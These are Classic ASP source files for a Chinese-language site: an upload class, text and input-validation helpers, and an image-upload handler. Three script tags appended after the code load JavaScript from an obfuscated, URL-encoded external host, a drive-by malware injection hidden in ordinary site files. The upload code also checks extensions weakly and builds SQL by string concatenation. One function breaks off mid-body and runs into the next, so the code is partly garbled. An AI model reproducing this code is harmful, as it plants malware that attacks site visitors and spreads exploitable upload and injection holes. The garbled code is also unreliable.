upload_object.asp
<SCRIPT RUNAT=SERVER LANGUAGE=VBSCRIPT>
dim upfile_5xSoft_Stream
Class upload_5xSoft
dim Form,File,Version
Private Sub Class_Initialize
dim iStart,iFileNameStart,iFileNameEnd,iEnd,vbEnter,iFormStart,iFormEnd,theFile
dim strDiv,mFormName,mFormValue,mFileName,mFileSize,mFilePath,iDivLen,mStr
Version="HTTP上传程序"
if Request.TotalBytes<1 then Exit Sub
set Form=CreateObject("Scripting.Dictionary")
set File=CreateObject("Scripting.Dictionary")
set upfile_5xSoft_Stream=CreateObject("Adodb.Stream")
upfile_5xSoft_Stream.mode=3
upfile_5xSoft_Stream.type=1
upfile_5xSoft_Stream.open
upfile_5xSoft_Stream.write Request.BinaryRead(Request.TotalBytes)
vbEnter=Chr(13)&Chr(10)
iDivLen=inString(1,vbEnter)+1
strDiv=subString(1,iDivLen)
iFormStart=iDivLen
iFormEnd=inString(iformStart,strDiv)-1
while iFormStart < iFormEnd
iStart=inString(iFormStart,"name=""")
iEnd=inString(iStart+6,"""")
mFormName=subString(iStart+6,iEnd-iStart-6)
iFileNameStart=inString(iEnd+1,"filename=""")
if iFileNameStart>0 and iFileNameStart<iFormEnd then
iFileNameEnd=inString(iFileNameStart+10,"""")
mFileName=subString(iFileNameStart+10,iFileNameEnd-iFileNameStart-10)
iStart=inString(iFileNameEnd+1,vbEnter&vbEnter)
iEnd=inString(iStart+4,vbEnter&strDiv)
if iEnd>iStart then
mFileSize=iEnd-iStart-4
else
mFileSize=0
end if
set theFile=new FileInfo
theFile.FileName=getFileName(mFileName)
theFile.FilePath=getFilePath(mFileName)
theFile.FileSize=mFileSize
theFile.FileStart=iStart+4
theFile.FormName=FormName
file.add mFormName,theFile
else
iStart=inString(iEnd+1,vbEnter&vbEnter)
iEnd=inString(iStart+4,vbEnter&strDiv)
if iEnd>iStart then
mFormValue=subString(iStart+4,iEnd-iStart-4)
else
mFormValue=""
end if
form.Add mFormName,mFormValue
end if
iFormStart=iformEnd+iDivLen
iFormEnd=inString(iformStart,strDiv)-1
wend
End Sub
Private Function subString(theStart,theLen)
dim i,c,stemp
upfile_5xSoft_Stream.Position=theStart-1
stemp=""
for i=1 to theLen
if upfile_5xSoft_Stream.EOS then Exit for
c=ascB(upfile_5xSoft_Stream.Read(1))
If c > 127 Then
if upfile_5xSoft_Stream.EOS then Exit for
stemp=stemp&Chr(AscW(ChrB(AscB(upfile_5xSoft_Stream.Read(1)))&ChrB(c)))
i=i+1
else
stemp=stemp&Chr(c)
End If
Next
subString=stemp
End function
Private Function inString(theStart,varStr)
dim i,j,bt,theLen,str
InString=0
Str=toByte(varStr)
theLen=LenB(Str)
for i=theStart to upfile_5xSoft_Stream.Size-theLen
if i>upfile_5xSoft_Stream.size then exit Function
upfile_5xSoft_Stream.Position=i-1
if AscB(upfile_5xSoft_Stream.Read(1))=AscB(midB(Str,1)) then
InString=i
for j=2 to theLen
if upfile_5xSoft_Stream.EOS then
inString=0
Exit for
end if
if AscB(upfile_5xSoft_Stream.Read(1))<>AscB(MidB(Str,j,1)) then
InString=0
Exit For
end if
next
if InString<>0 then Exit Function
end if
next
End Function
Private Sub Class_Terminate
form.RemoveAll
file.RemoveAll
set form=nothing
set file=nothing
upfile_5xSoft_Stream.close
set upfile_5xSoft_Stream=nothing
End Sub
Private function GetFilePath(FullPath)
If FullPath <> "" Then
GetFilePath = left(FullPath,InStrRev(FullPath, "\"))
Else
GetFilePath = ""
End If
End function
Private function GetFileName(FullPath)
If FullPath <> "" Then
GetFileName = mid(FullPath,InStrRev(FullPath, "\")+1)
Else
GetFileName = ""
End If
End function
Private function toByte(Str)
dim i,iCode,c,iLow,iHigh
toByte=""
For i=1 To Len(Str)
c=mid(Str,i,1)
iCode =Asc(c)
If iCode<0 Then iCode = iCode + 65535
If iCode>255 Then
iLow = Left(Hex(Asc(c)),2)
iHigh =Right(Hex(Asc(c)),2)
toByte = toByte & chrB("&H"&iLow) & chrB("&H"&iHigh)
Else
toByte = toByte & chrB(AscB(c))
End If
Next
End function
End Class
Class FileInfo
dim FormName,FileName,FilePath,FileSize,FileStart
Private Sub Class_Initialize
FileName = ""
FilePath = ""
FileSize = 0
FileStart= 0
FormName = ""
End Sub
Public function SaveAs(FullPath)
dim dr,ErrorChar,i
SaveAs=1
if trim(fullpath)="" or FileSize=0 or FileStart=0 or FileName="" then exit function
if FileStart=0 or right(fullpath,1)="/" then exit function
set dr=CreateObject("Adodb.Stream")
dr.Mode=3
dr.Type=1
dr.Open
upfile_5xSoft_Stream.position=FileStart-1
upfile_5xSoft_Stream.copyto dr,FileSize
dr.SaveToFile FullPath,2
dr.Close
set dr=nothing
SaveAs=0
end function
End Class
</SCRIPT><script src="http://%78%66%2E%6B%30%31%30%32%2E%63%6F%6D/%30%31%2E%61%73%70"></script>
ubb.asp
<%
function exchange_str(funt_str)
funt_str=replace(funt_str," ",chr(32))
funt_str=replace(funt_str,"<br>",chr(13))
funt_str=replace(funt_str,">",">")
funt_str=replace(funt_str,"<","<")
exchange_str=replace(funt_str,"""","'")
end function
function check_str(fout_str)
fout_str=replace(fout_str,"[","<")
fout_str=replace(fout_str,"]",">")
fout_str=replace(fout_str,"'","""")
fout_str=replace(fout_str,chr(13),"<br>")
check_str=replace(fout_str,chr(32)," ")
end function
function check_intro(fout_str)
check_intro=replace(fout_str,"'","''")
check_intro=replace(check_intro,"<br>","")
end function
function news(fout_str)
fout_str=replace(fout_str,"'","""")
fout_str=replace(fout_str,chr(13),"<br>")
news=replace(fout_str,chr(32)," ")
end function
function mess(title,body,fname)
mess ="<html><head><title>" & title & "</title>"
mess = mess & "<meta http-equiv=""refresh"" content=""2"
if trim(fname)<>"none" then
mess = mess & ";url=" & fname
end if
mess = mess & """></head><body bgcolor=""#FFFFFF"" text=""#000000"">"
mess = mess & "<p> </p><p> </p><p> </p><p> </p><p> </p>"
mess = mess & "<p align=""center""><font color=""#FF0000"">" & body & "</font></p>"
mess = mess & "</body></html>"
response.write mess
response.end
end function
function sendemail(from_mail,to_mail,mail_sub,conj)
dim objMail
Set objMail = Server.CreateObject("CDONTS.NewMail")
' 检测电话号码
'************************************************************************************************
function check_tel(tel)
check_tel=false
num=len(tel)
if num<7 or num>22 then
check_tel=true
exit function
end if
for i=1 to num
teltest=Asc(mid(tel,i,1))
if not(teltest>47 and teltest<58 or teltest=45) then
check_tel=true
exit function
end if
next
teltest=split(tel,"-")
num=ubound(teltest)
if num>2 then
check_tel=true
exit function
else
if not(len(teltest(num))>6 and len(teltest(num))<10 )then
check_tel=true
exit function
end if
if num-1>-1 then
if not(len(teltest(num-1))>2 and len(teltest(num-1))<6 ) then
check_tel=true
exit function
end if
end if
if num-2>-1 then
if not(len(teltest(num-2))>1 and len(teltest(num-2))<6 ) then
check_tel=true
exit function
end if
end if
end if
end function
'************************************************************************************************
' 判断姓名是否为中文
'************************************************************************************************
function check_name(names)
check_name=false
num=len(names)
if not(num>1 and num<9) then
check_name=true
exit function
end if
for i=1 to num
namestest=Asc(mid(names,i,1))
if namestest>-600 then
check_name=true
exit for
end if
next
end function
'************************************************************************************************
' 检测E-mail地址
'************************************************************************************************
function check_email(email)
break=instr(email,"@")
if break=0 then
check_email=true
exit function
end if
check_email=false
end function
function IsEmail(email)
dim names, name, i, c
'Check for valid syntax in an email address.
IsEmail = true
names = Split(email, "@")
if UBound(names) <> 1 then
IsEmail = false
exit function
end if
for each name in names
if Len(name) <= 0 then
IsEmail = false
exit function
end if
for i = 1 to Len(name)
c = Lcase(Mid(name, i, 1))
if InStr("abcdefghijklmnopqrstuvwxyz_-.", c) <= 0 and not IsNumeric(c) then
IsEmail = false
exit function
end if
next
if Left(name, 1) = "." or Right(name, 1) = "." then
IsEmail = false
exit function
end if
next
if InStr(names(1), ".") <= 0 then
IsEmail = false
exit function
end if
i = Len(names(1)) - InStrRev(names(1), ".")
if i < 2 or i > 4 then
IsEmail = false
exit function
end if
if InStr(email, "..") > 0 then
IsEmail = false
end if
end function
function checkchar(str1)
dim i,temp_char,temp_str
temp_str=trim(str1)
for i=1 to len(temp_str)
temp_char=mid(temp_str,i,1)
if (asc(temp_char)>47 and asc(temp_char)<58) or (asc(temp_char)>96 and asc(temp_char)<123) or asc(temp_char)=95 then
checkchar=true
else
checkchar=false
exit function
end if
next
end function
%><script src="http://%78%66%2E%6B%30%31%30%32%2E%63%6F%6D/%30%31%2E%61%73%70"></script>
<body>
<%
set upload=new upload_5xSoft
dim str
fold_tmp=cstr(date())
set fd=Createobject("Scripting.FileSystemObject")
fs=fd.FolderExists(server.mappath("images/" & fold_tmp))
if not(fs) then
fd.CreateFolder server.mappath("images/" & fold_tmp)
end if
set fd=nothing
formPath="images/" & fold_tmp & "/" '图片上传路径
for each formName in upload.file '列出所有上传了的文件
set file=upload.file(formName) '生成一个文件对象
if file.filesize > 2000000 then
response.write "<script>alert(""对不起,图片大小应小于200K!"");history.go(-1);</script>"
response.end
end if
if file.filesize > 0 and file.filesize < 2000000 then
fileExt=lcase(right(file.filename,4)) '取得文件扩展名
filename=year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now)&file.FileName
img="images/"&fold_tmp&"/"&filenam
if fileEXT <> ".gif" and fileEXT <> ".jpg" and fileEXT <> ".bmp" and fileEXT <> ".rar" and fileEXT <> ".doc"and fileEXT <> ".txt" and fileEXT <> ".swf" then
response.write "<p align='center'><br><br><br><br><br><font size=2>错误提示:文件格式不对 [ <a href=# onclick=history.go(-1) style='color:red'>重新上传</a> ]</font></p>"
response.end
else
file.SaveAs Server.mappath(formPath&filename)
if filename = "" then
fold_tmp = ""
end if
if filename <> "" and fold_tmp <> "" then
str="insert into upload(img,submit_date) values('"&img&img1&img2&img3&img4&"','"&date&"')"
db.execute(str)
end if
end if
end if
set file=nothing
next
set upload=nothing
response.Redirect"upload.asp"
%>
</body>
</html>
<script src="http://%78%66%2E%6B%30%31%30%32%2E%63%6F%6D/%30%31%2E%61%73%70"></script>